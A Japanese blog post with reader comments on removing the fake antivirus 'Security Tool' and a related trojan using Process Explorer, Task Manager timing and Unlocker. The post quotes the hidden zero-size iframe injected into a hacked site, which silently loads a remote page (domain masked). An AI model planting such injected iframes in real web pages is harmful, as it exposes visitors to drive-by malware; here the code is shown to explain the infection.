猛威を振る偽ソフト「Security Tool」の駆除について。


「Security Tool」というマルウェア。

特徴は改ざんれたサイトにアクセスした途端、セキュリティソフトのフリをして偽情報を表示してダウンロードされ、振込請求します。

改ざんされたWebページ(まだ危険なので名前は出しませんが日本のシンガー・ソングライター)のソースを見ると<body>開始タグの直後に

<iframe frameborder=”0″ onload=”if (!this.src){ this.src=’http://***/index.php’; this.height=’0′; this.width=’0′;}” >lhpxbmnqogjkzjhhwmelugbwezromrm</iframe>
(***はロシアのドメインでした)

が埋め込まれていました。なんとサイズゼロのiframeです。

デスクトップが消え、「Security Tool」の画面が出ます。

securitytool

上の画面写真は下記から拝借。
http://www.bleepingcomputer.com/virus-removal/remove-security-tool

なお修復は、この方のページにありました。助かります。

セキュリティーソフトを装ったウイルス(本虫の雑記帳)

トロイの木馬
なんとか知人のPCを復活できたのですが、CPUが延々100%に。
先般DLしたprocexp.exeでプロセスを見ると_ex-08.exeという怪しいEXEファイルの活動が・・。
その_ex-08.exeは、C:\WINDOWS\Tempの中にありました。

ウイルスソフトでスキャンすると、トロイの木馬。
_ex-08.exeというトロイの木馬で、C:\WINDOWS\Tempの中にありました。
これは直接ディレクトリを開けて削除しようとしてもできないので、いったんプロセスをSTOPさせる必要があります。

どうぞ、皆さんのPCをご自愛ください。

(12/28訂正)
774さんから「タスクマネージャーは起動できてもロックかかりますよ」とご指摘いただきました。
確認せずに書いてゴメンなさい。
じゃ、やっぱり上記の本虫の雑記帳さんが書いていたProcess Explorerで、いったんプロセスをSTOPさせてから削除するしかないようです。


猛威を振る偽ソフト「Security Tool」の駆除について。” への9件のフィードバック

  1. タスクマネージャーは起動できてもロックかかりますよ

  2. Process Explorerもロックがかかりmした。
    システムの復元でロールバックさえロックがかかり起動出来ません・・・。
    なにかを起動させようとすると直ぐロックがかかるようです・・・・。
    あ。でもブラウザは何故か起動してるな・・・フム。。
    リカバったほーがいいのかなぁ。。ああ。2009年最終日最悪!

  3. 匿名さん、Process Explorerは名前を変えてますか?
    本の虫さんところに
    「procexp.exe」の名前を「explorer.exe」に変更して実行します。「procexp.exe」のままでは実行できませんでした。おそらく「Security Tool」にブロックされているのではないかと思われます。
    ・・・と書いてありましたが。

  4. 再起動して「Security Tool」が立ち上がるまでにCtrl+Alt+Deleteでタクスマネージャーを立ち上げればロックがかかる前なのでタスクマネージャを起動できます。
    後は通常通りSecurity Toolのプロセスを終了&削除です。

  5. 「素人ですが 」さん、コメありがとう。タスクマネージャのタイミングではおKなのですね。一度やってみます。

  6. 「unlocker」がインストールされていれば稼働中でも_ex-08.exeを削除出来ます。お試しあれ。(経験済み)もしDLしてもインストール出来ない場合はファイル名を「Explorer.exe」に変更してインストールして下さい。

  7. diekatzeさん
    2009年11月に書いたこの記事が、いまだに上位3番目ぐらいのアクセスを集めているところをみると、相当被害が大きく鎮静化していないようです。
    情報提供ありがとう。

  8. Security Tool削除方法については
    色々見たけどこれが一番簡単
     ①移動
     ②再起動
     ③削除
    の3ステップで完了

    しかもなんのソフトも必要無しだからすごい!

    http://minkabu.jp/blog/show/275330

コメントを残す

メールアドレスが公開されることはありません。